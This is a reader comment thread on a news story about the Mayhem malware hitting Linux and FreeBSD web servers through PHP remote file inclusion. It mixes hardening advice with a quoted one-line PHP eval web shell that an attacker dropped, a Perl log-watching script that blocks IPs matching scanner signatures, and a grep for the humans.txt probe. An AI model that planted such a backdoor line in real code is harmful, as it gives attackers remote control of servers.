back to article Manic malware Mayhem spreads through Linux, FreeBSD web servers

Malware dubbed Mayhem is spreading through Linux and FreeBSD web servers, researchers say. The software nasty uses a grab bag of plugins to cause mischief, and infects systems that are not up to date with security patches. Andrej Kovalev, Konstantin Ostrashkevich and Evgeny Sidorov, who work at Russian internet portal Yandex, …

  1. btrower

    Tired admin

    I have four or five net facing servers and I get dinged from time to time. There is not much you can do except try to keep a low profile. I will be looking at a secure operating environment next month and hopefully, once I can prove it out, I will be able to shift things over to that -- vanilla, vanilla, vanilla.

    The main way to avoid someone breaking into your server is to make sure there is not much worth stealing. Is there anyone with a serious presence on the Internet that has not been compromised at some point? I doubt it.

    1. Ole Juul

      Re: Tired admin

      I'm curious about what you mean by "not much worth stealing". Surely anybody with a "serious presence on the Internet" has bandwidth. That's worth stealing.

    2. ckm5

      Re: Tired admin

      Some tips

      1. Harden your system Ubuntu - http://www.thefanclub.co.za/how-to/how-secure-ubuntu-1204-lts-server-part-1-basics - there are similar guides for other systems

      2. Disable and remove all unused services

      3. Firewall all ports except the ones you use

      4. Auto-update

      5. Two-factor everywhere - both Google's Authenticator & Duo Security work great and are free

      6. Cloudflare - a web app firewall that is free

      7. If you are running Apache, there are some great modules for application security

      8. AppArmor or SE Linux

      9. Remove compilers when not needed

      10. Bandwidth throttling - you can prevent a lot of damage by throttling bandwidth - with Cloudflare acting as a CDN, you should be able to greatly reduce your bandwidth needs.

      Note that people don't break into your system to steal anything, they want remote control over the machine to do things with it (DDOS, distribute malware, etc).

      The point of hardening is the same thing as why you lock your door. It doesn't actually prevent anyone from breaking in, it just makes them move on to easier targets....

      1. ckm5

        Re: Tired admin

        Not sure why the thumbs down, either you want to make sure people have weak systems or you think I'm wrong/misguided/an idiot (perhaps all three).

        Why not comment to improve my comment? That would be way more helpful than a downvote.

        1. Ole Juul

          Re: Tired admin

          Not sure why the thumbs down,

          Wasn't me, but I notice some strange thumbs-downs around here. I've even seen thumbs-down on a question. WTF? It's as if some commentards view everything as a religious belief or something like that. To me, a comment can sometimes be good even if I don't agree with it.

          1. Jamie Jones Silver badge

            Re: Tired admin

            I was once followed for about 2 weeks by someone who downvoted all my posts, however innocent they were.

            And 'Matt Bryant' seems to have had a few downvoting groupies for quite some time!

            As for this case, well, it wasn't me, but maybe someone didn't like your implied assumption they'd be running Ubuntu? Or that your post dealt with OS related stuff, (thus implying - *gasp* - that Linux has some issues, whilst clearly this is a dumb app/admin issue)

            1. Destroy All Monsters Silver badge
              Trollface

              Re: Tired admin

              And 'Matt Bryant' seems to have had a few downvoting groupies for quite some time!

              That's because he nasty. And generally wrong.

              1. Matt Bryant Silver badge
                Facepalm

                Re: Destroyed All Braincell's Re: Tired admin

                "That's because he nasty......" Cry more, or better still, grow up,and try a post vaguely to do with the thread. You have heard of Linux, I presume?

                "......And generally wrong." Yes, and you have proven this when? Oh, never, whereas debunking your bleats takes mere minutes.

                Instead of whining, why don't you look through ckm5's useful post and see if you can add anything? I could suggest tying all users to using the bash shell as it has a very simple way of dropping their command line activity into ~<username>/.bash_history. I would also suggest changing the syslog.conf to actually write to a file on a remote system but leave a dummy syslog file locally - we picked up an internal doing stuff he shouldn't because he thought clearing out the history and the local syslog would hide his tracks. Other than that, the best advice is to not just secure your server and leave it, but to regularly (daily if you have the time) trawl through the logs and check for signs of hacking.

                1. Anonymous Coward
                  Anonymous Coward

                  Re: Destroyed All Braincell's Tired admin

                  Tie all users to bash? For security? Oh dear.

                  Many shells have got a history file, including posix sh, ksh and others.

                  How about restricted shells for those who need no more?

                  One could say that storing history in a file is bad (gives away a lot of commands, of course).

                  1. Matt Bryant Silver badge
                    Facepalm

                    Re: AC Re: Destroyed All Braincell's Tired admin

                    ".....Many shells have got a history file, including posix sh, ksh and others....." Indeed they do, and many users tweak their HISTFILE attribute and put that history file in many different places, but on all the OSs I have tried, including on hp-ux and AIX (though it does not have official hp support, can't recall if it is by IBM), the history files is in exactly the same place. I try not to let even admins use Korn (on hp-ux at least) because it has a few security issues, like automatically enabling history for root - popular with lazy saysadmins but not good security. If you tie the users to bash, you know where their history is going to be, and it has the added benefit that Linux users get a familiar shell experience when they log into an UNIX system. I also would suggest not allowing direct root login (stops anonymous root logins) and then restricting access to such tools as su so only select users can login and then switch to root.

                    ".....One could say that storing history in a file is bad (gives away a lot of commands, of course)." Part of restricting a users shell is that you make sure they cannot wander out of their restricted set of directories. So, no, they cannot read another user's history file.

          2. Arctic fox
            Thumb Up

            @Ole Juul "a comment can sometimes be good even if I don't agree with it."

            I entirely agree. I have in fact on several occasions upvoted a well written post even where I disagreed with it. If someone clearly is trying to make a contribution (as someone further up has already said) why not post and engage with them? Downvoting and not posting is very often (albeit not always of course) the equivalent to the childhood game of ringing on somebody's doorbell and running away.

            1. Anonymous Coward
              Anonymous Coward

              Re: @Ole Juul "a comment can sometimes be good even if I don't agree with it."

              "Downvoting and not posting is very often (albeit not always of course) the equivalent to the childhood game of ringing on somebody's doorbell and running away."

              Indeed so. Both are excellent fun.

        2. Anonymous Coward
          Anonymous Coward

          Re: Tired admin

          Not sure why the thumbs down, either you want to make sure people have weak systems or you think I'm wrong/misguided/an idiot (perhaps all three).

          Linux is the ultimate virus free secure out of the box system everyone should use

          IOS is the ultimate virus free secure out of the box system everyone should use

          Windows is the ultimate virus riddled out of the box system no-one should use it

          the down voters usually fall into one or other camp /s

        3. Tom 13

          Re: Not sure why the thumbs down

          It wasn't me, but having followed the threads here, I'll wager it was because you were too specific on the OS. In this case some fanbois will be particularly offended that you recommended it in an article about it being compromised by malware. No, it doesn't matter how factually/statistically correct you are.

      2. Don Dumb

        Re: Tired admin

        @ ckm5 -

        4. Auto-update
        Can't argue with most of your tips, but I would disagree with point 4, in particular for business or any important servers. A sysadmin really should check that every patch works and doesn't break critical services/applications before deploying. Or at the very least, the sysadmin should deploy the patch themselves at a specific time, so that if something does go wrong they are around to fix it and know what he/she has just done that might have caused things to go wrong. Leaving updating to an external service/provider is essentially allowing a third party to break your systems outside of your control.

        Auto-update might seem like it makes sense but even very important, simple and lightweight patches *could* contain a bug that breaks something. Especially when the most important patches are often the most rushed. Just look back through the archives of the site and you will see major software houses releasing patches that were buggy and the patch was either withdrawn or itself patched in short time.

        For the sake of a few days, it is worth testing any update, or applying it at a time you can be there to clean up its mess and/or limit the damage.

        1. Robert Helpmann??
          Childcatcher

          Re: Tired admin

          A sysadmin really should check that every patch works and doesn't break critical services/applications before deploying.

          I could not agree more and yet the people who get pissy if the "critical services/applications" aren't working are typically the same bunch who will not fork over the cash to set up development or test environments. I have had to work in several large network environments in which we had to "test in production," which basically means that we target a subset of the overall production environment and see what happens next before proceeding with the rest.

      3. Charlie Clark Silver badge
        Thumb Down

        Re: Tired admin

        This is really a splatter-gun approach which fails to grasp the attack. Most of the points are reasonable, though I'd argue that a public server should only install and run the services that it needs. Coincidentally, this is OpenBSD approach.

        As (some) others have noted the attack uses remote file inclusion on servers running PHP. There is a simple solution to that… ;-) If you do need PHP then configure it so that RFI is not possible. Relying on defaults and auto-updates in this case are not sufficient.

        Using a CDN to soak up and scrub traffic is certainly a good start but your server will generally still be accessible via a sub-domain or via a port-scan.

      4. Anonymous Coward
        Anonymous Coward

        @ckm5

        Good points, however there's one more which can directly help to prevent nastyness like this:

        * Disallow exec permissions on temp directories such as /tmp and/or /var/tmp.

        * Do the same for the web root directories (/home/client/public_html for example).

        In a lot (if not most) cases where a webserver gets compromised the attacker needs a place from which to run its stuff. And since you're usually dealing with script kiddies they'll most likely stick to commonly known places. Thus; the current home directory and if that doesn't work /tmp will be used. Yet when that also fails then your average kiddie will be unable to proceed.

    3. Anonymous Coward
      Anonymous Coward

      Re: Tired admin

      "I will be looking at a secure operating environment next month"

      Yeah, we already did the same and migrated all our LAMP stack servers to Windows Server 2012 R2. Relatively painless and far fewer vulnerabilities to worry about now.

  2. PCS

    Maybe after this the penguin lovers will stop looking so bloody smug with their "my OS is virus-proof" arguments.

    1. ~mico
      Facepalm

      virus-proof

      Traditionally, *nix servers were susceptible to worms, and Windows PCs - to viruses. The main difference is the former are "alive", and search and attack vulnerable systems autonomously, while the latter are "dead" and require user interaction in order to spread. This latest malware doesn't change the tradition: it's a worm.

    2. John Tserkezis

      "Maybe after this the penguin lovers will stop looking so bloody smug with their "my OS is virus-proof" arguments."

      Oh bugger off and go back to fondling your fruit. Yes, the half-eaten one presumably because it has a worm in it.

    3. Jamie Jones Silver badge
      Flame

      " Maybe after this the penguin lovers will stop looking so bloody smug with their "my OS is virus-proof" arguments."

      Obvious troll etc.

      But just in case, unlike you, I assume the penguin lovers know the difference between the OS and its applications - the latter which may have bugs or be configured incorrectly.

      Here's a clue: This malware needs to be downloaded to a server and be executed. We aren't talking about fooling the OS into running it - no, it has to be run by a user (I.e. a process which could be a dæmon - not necessarily a human user)

      I'm sure that if a user executed 'del/s \*.*' in a dos prompt on a windows machine, not even the most fanatical Linux fanboi would blame windows for those files being deleted.

      The real issue

      The real issue here is the stupid applications that have bugs that allow arbitrary files to be uploaded and executed in the first place - and morons who type 'chmod 777' on files/directories that they install.

      Furthermore, attacks like these can be mitigated with common sense by *using* standard features of a Unix operating system:

      • NEVER have a dæmon run under the same user as that which owns the code files.
      • Don't enable cron facilities for a dæmon that doesn't need them (or again, run cronjobs via a different user than the one the dæmon runs as)
      • Never blindly run 'chmod 777' on anything [ this particular piece of malware attempts to write to the file /etc/rc.local - *anyone* who runs a machine where that would work should be forced to listen to Justin Bieber non-stop for a week ]
      • Consider running unaudited dæmons in a jailed subsystem (or at least a chroot) - and if your system supports it, use sandboxing/process-restrictions to disable any functions that will never be legitimately needed)

      1. Steve Holdoway

        Hmmm...

        Every CMS known to man requires a space writeable by the web server / server side scripts. As such, owning all files by another user will only protect *part* of your docroot, and as such all you're really providing is 'security through obscurity'. If you're not using a CMS, then you can further lock down your docroot by making files ( and directories! ) immutable, which is as far as possible a completely secure solution.

        Some cron jobs *must* run as the damon user. A specific example: Magento re-index creates a lock file for each index as it works on it, which ends up owned by the user running the process ( assuming they had permission to overwrite it in the first place ). This will prohibit the interactive run of a reindex from the CMS backend as the file can't be recreated by the daemon ( yes there's a million and one ways around this, but I'm making a point! ).

        Chroot jails are also provably insecure... if you're this bothered about security, then you need to separate via VMs, or the new lightweight altrnative, docker, which I'm desperately trying to find time to investigate further. All other alternatives lull you into a false sense of security to some level.

        I agree 100% on the chmod 777 thing though, anyone who writes this has no concept of *nix file permissions. Any software install instructions containing this requirement prompts me to delete it immediately, and be very circumspect on any other software from the same author.

      2. Tom 13

        Re: not even the most fanatical Linux fanboi would blame windows

        Yes, yes they would. They wouldn't be any more correct than the MS fanbois who are always spouting off about how many vulnerabilities Linux has, but they would. Granted MOST Linux admins wouldn't.

  3. MooJohn

    It's all about mitigation

    You can't stop all attacks; you can only do your best to mitigate them by limiting what the malware can do if it does make it inside. It's the basics like running the web server as a user who can do little else, and specifically blocking access to other areas of the filesystem and even to basic system commands if you can manage it.

    The goal is to leave them with perhaps a site defacement but nothing in the way of "real" access to the rest of that machine or the rest of your network. Look at each user and ask yourself "If this user is compromised, what can it do?" You want it capable of doing its job and as little else as you can get away with!

    1. Eddy Ito

      Re: It's all about mitigation

      Isn't this exactly what containers are supposed to be for? Give each service its own little sandbox to prevent corruption of the rest of the machine.

      The thing I don't understand is that if they hard coded 8.8.8.8 as the DNS for finding humans.txt couldn't you just set the hosts file to redirect it as a temporary workaround?

      1. Charles 9

        Re: It's all about mitigation

        "The thing I don't understand is that if they hard coded 8.8.8.8 as the DNS for finding humans.txt couldn't you just set the hosts file to redirect it as a temporary workaround?"

        Doesn't it work the other way around, translating a DNS name to a number? Which means 8.8.8.8 or any other direct IPv4 address gets addressed directly? That's how some ad-blockers work: by assigning 127.0.0.1 (localhost) to all the ad-spewing domain names.

        1. Eddy Ito

          Re: It's all about mitigation

          D'oh, that's right. The firewall would have to filter 8.8.8.8 requests.

  4. Franklin

    Had a Web server (a shared hosting server operated by a big-name hosting provider) get hit by this recently. It dropped a PHP file onto the server that contained the line

    <?php @eval(stripslashes($_REQUEST[ev]));

    from which, as you can imagine, all manner of mayhem became possible.

  5. Destroy All Monsters Silver badge
    Paris Hilton

    The fock?

    How the fuck does one just "drop a PHP file onto the server" which is then executed?

    Do people have ExecCGI on wherever?

    The mind boggles.

    Also, looks like MAYHEM_DEBUG should be set to cause the dropper to exit(0). Do it.

    And what does human.txt have to do with all of this

    1. djack

      Re: The fock?

      AFAIK, the male are uses humans.txt as a test to see if rfi is possible. Seems a bit draft and wasteful to me. Implying that Google could prevent this malware (and therefore it's all Google's fault) by changing humans.txt seems a bit disingenuous to me. The test could be easily changed to refer to any other arbitrary file.

    2. Anonymous Coward
      Anonymous Coward

      Re: The fock?

      "How the fuck does one just "drop a PHP file onto the server" which is then executed?"

      People run OSs with very high vulnerability counts and high exploit risks like Linux for Internet facing servers and then don't patch them, and then they run a similarly historically insecure stack on top of them such as Apache, MySQL and PHP....

      1. okcomputer44

        Re: The fock?

        "People run OSs with very high vulnerability counts and high exploit risks like Linux for Internet facing servers"

        Like Linux? Hope you meant like Windows... :)

  6. Christian Berger

    Ahh, so it's PHP malware

    This has very little to do with Linux and FreeBSD, but with PHP which makes it _really_ hard to write secure code. (at least a lot harder than writing insecure code)

  7. vagabondo
    Unhappy

    What century are these guys in?

    "In the *nix world, autoupdate technologies aren't widely used,"

    Maybe 30 years ago ( BSD, tapes, and 64kb Internet access), or even Linux 20 years ago. However a quick look at some old Linux admin manuals shows that by 2001 SuSE shipped with on-line-update as standard. The defaults were to run weekly and apply security patches. I cannot believe that most other *nix systems did not have their equivalents.

    In that time the only update relate problems that I can recall were a Postfix configuration backed up and replaced with an updated default (spotted and fixed within the hour), and a few occasions where users had "cut and pasted" dodgy PHP that stopped working after an update.

    It's really not hard to keep a Linux server tolerably secure. With any decent distribution that is the default, and it does not have a significant cost. You have to decide to do something (stupid) to introduce a meaningful insecurity.

    1. Fibbles

      Re: What century are these guys in?

      Presumably there are admins out there who want to vet every patch before it is applied to make sure it won't bork their system. I'm not a sys admin but if I was I'd rather have to explain to the boss that the server is down because the distro provider arsed up one of their security patches than have to explain that it is down because I hadn't gotten around to applying the latest security patches.

    2. Stuart Castle Silver badge

      Re: What century are these guys in?

      The problem with enabling autoupdate is simple. A patch may break something. This is annoying on a personal level, but usually fixable.

      On an enterprise level,it could be devastating. If that patch broke a system the company relied upon, it could bankrupt the company. You can blame (or even sue) the manufacturer or distribution provider all you want, but that won't bring the company back.

      This is why, as a sys admin, you test every change or patch repeatedly and as thoroughly as is possible. Preferably with multiple testers. This is why patching costs a lot.

      The other problem is a lot of companies run legacy systems, These systems may require something only offered by a particular version of a system component. However, the company may have no access to the source code for those systems. Even if they have the source code, they may not have access to a development system that can use that source code. Either way, they will be unable to alter the system.

      1. Pseudonymous Coward

        Re: What century are these guys in?

        Not that I actually do this, but I keep thinking I probably should: How about having a sizable amount of reasonably thorough tests (Continuous Integration style) for the whole of your environment, then test the patch in a TEST environment, if those tests all pass it's pretty safe to proceed with an automated update.

        If the tests find issues with the patch, alert the admin (and in the meantime monitor if further incoming patches work better as a whole).

      2. Tom 13

        Re: problem with enabling autoupdate is simple

        This conventional wisdom, much like complex passwords for everything, is one that needs to be re-examined.

        Not all systems are mission critical. In fact, I expect that even most systems that get classified as mission critical don't require the level of security that tests every patch before it is deployed. Those that do most likely have the fund available to do that testing including the manpower required for it. Next, look at the lists of released patches that have broken systems in the last decade. Now compare that with the number of virus signature updates that have broken systems. I think the virus scanners have broken more systems than the patches have and very few places run without auto-updating their virus sigs every single day. Which means that on a rational basis, most systems can probably be auto-updated with relative safety. Certainly many of them can be, especially user boxes.

    3. Number6

      Re: What century are these guys in?

      My Linux machines tell me when there are new updates available but I have to install them manually. Mind you, I have the work Windows laptop configured to do the same, it's one of the things I do automatically whatever the OS. The one place that made auto-update a group policy, I made a point of shouting loudly at the IT staff whenever my machine rebooted overnight and lost whatever work I'd left it doing.

    4. Christian Berger

      Re: What century are these guys in?

      I think most Linux Distributions had autoupdate long before Microsoft even started that near pointless scrap of update mechanism they have now.

      1. phuzz Silver badge
        Facepalm

        Re: What century are these guys in?

        According to wikipedia: the first version of Debian including apt was in 1999, yum seems to be slightly later (~2001). Windows Update was introduced along with Win95. The Apple software updater was introduced in OS9 (1999). dpkg was originally introduced in 1994, but was just a package installer/remover then, not an update service.

        I'm sure someone had a software update service at the OS level before Win95 but I can't find one. Of course, the cynical among you will argue that an update system was needed more badly by Windows than by any other OS.

        Call me old fashioned, but I remember when software would be released and never updated again.

  8. Anonymous Coward
    Anonymous Coward

    No PHP and dropping.

    I don't have PHP installed, and got fed up with all the scans looking for wordpress login page bugs etc (some scans try hundreds of php things, lasting 5 minutes or more), so knocked up a bit of perl that as soon as it sees a request/or reference to PHP in server logs it adds the IP to ipsets which is included in my firewall rules - *bang* IP is immediately dropped and blocked.

    :)

    1. Destroy All Monsters Silver badge

      Re: No PHP and dropping.

      You nasty bugger!

      1. Anonymous Coward
        Anonymous Coward

        Re: No PHP and dropping.

        Yes, terrible, aren't I... but it does reduce server hits (and bandwidth) by a LARGE amount.

        #!/usr/bin/perl -w

        # Nick - 31/01/2014

        # Public Domain code

        my $line;

        my $log="/path/to/server/logs/access_log";

        open(LOG,"/usr/bin/tail -F $log |") || die "ERROR: could not open log file.\n$

        while ($line = <LOG>) {

        if ( ($line =~ /php/) || ($line =~ /xml/)

        || ($line =~ /\/manager\/html/) || ($line =~ /w00tw00t/)

        || ($line =~ /x80w/) || ($line =~ /CONNECT/)

        || ($line =~ /\?\-s/) || ($line =~ /fck/)

        || ($line =~ /rtpd/) || ($line =~ /roundcube/)

        || ($line =~ /statics/) || ($line =~ /access/) || ($line =~ /mail2000/)$

        $line =~ s/ .*//g;

        chomp($line);

        `ipset add bh $line -exist`;

        `ipset save bh -f /path/to/ipsets-bh-firewall-file`;

        }

    2. Number6

      Re: No PHP and dropping.

      I remember one scanner that used to look for a file called "thisdoesnotexist" or similar. Except on my system it did, and provided a 30MB download of random data (this was back in the days when dial-up was still more common).

  9. Anonymous Coward
    Anonymous Coward

    I see 20 to 30 different IP addresses a day attempting the RFI test with the google humans.txt file - its been going on since at least the start of the year. I block them but as with most other attacks there is no response from any of the ISPs / Hosting companies if you report it

    1. Anonymous Coward
      Anonymous Coward

      Problem is they are all hacked MS windows machines - the people owning them don't even know what is going on. Also these scanner bots seem to have some sort of intelligence in that once hit and dropped via the firewall, they never come back - so that makes it appear there is some sort of database of 'who to attack and who not to'.

  10. Anonymous Coward
    Big Brother

    Linux and FreeBSD malware spreading?

    "Malware dubbed Mayhem is spreading through Linux and FreeBSD web servers, researchers say."

    How exactly does this malware get executed on the web servers in the first place?

    1. Charles 9

      Re: Linux and FreeBSD malware spreading?

      By using PHP, which could be on the server as part of a LAMP setup. It tests to see if the server can take in files via Remote File Inclusion (the Google file mentioned is just the test). If it works, it uses RFI to insert a PHP plugin, which then gets added to the web server and given the server's permissions (not that it really matters if the plugin contains a privilege escalation).

      1. Paul Hovnanian Silver badge

        Re: Linux and FreeBSD malware spreading?

        "If it works, it uses RFI to insert a PHP plugin, which then gets added to the web server and given the server's permissions"

        Which means smeone has configured their web service to run scripts as a user with administrative permissions (of at least the web server and its components).

        Isn't that a failure of Administration 101?

  11. ldm

    Quick way to check for infection

    On an Ubuntu or Debian system, this'll grep your compressed logs (in the default location, and assuming a sane logformat) for any request containing "humans.txt" that doesn't also return a 404:

    zgrep "humans.txt" /var/log/apache2/* | grep -v " 404 "

    Not exactly bullet proof, but I didn't see any mention in the analysis of the malware altering logs to cover its tracks.

    1. vagabondo

      Re: Quick way to check for infection

      A traditional *nix server will have the locate utility. So:

      :~> locate humans.txt

      will suffice.

      1. Stoneshop
        FAIL

        Re: Quick way to check for infection

        :~> locate humans.txt

        That will just tell you whether you have a file 'humans.txt' on your system, and only if the locate database is up to date. What you actually want to do, and what the poster you replied to did, was looking through Apache logging, whether there was a http request for said file located on google, so checking whether PHP allows requesting a remote file.

        1. vagabondo
          Facepalm

          Re: Quick way to check for infection -- @Stoneshop

          Thanks for the correction.

          print ("I must wake up before posting. I must not post rubbish!") x 100

  12. This post has been deleted by its author

  13. Gis Bun

    Not a good year for Linux/Unix. This, OpenSSL and then a further bug in OpenSSL.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like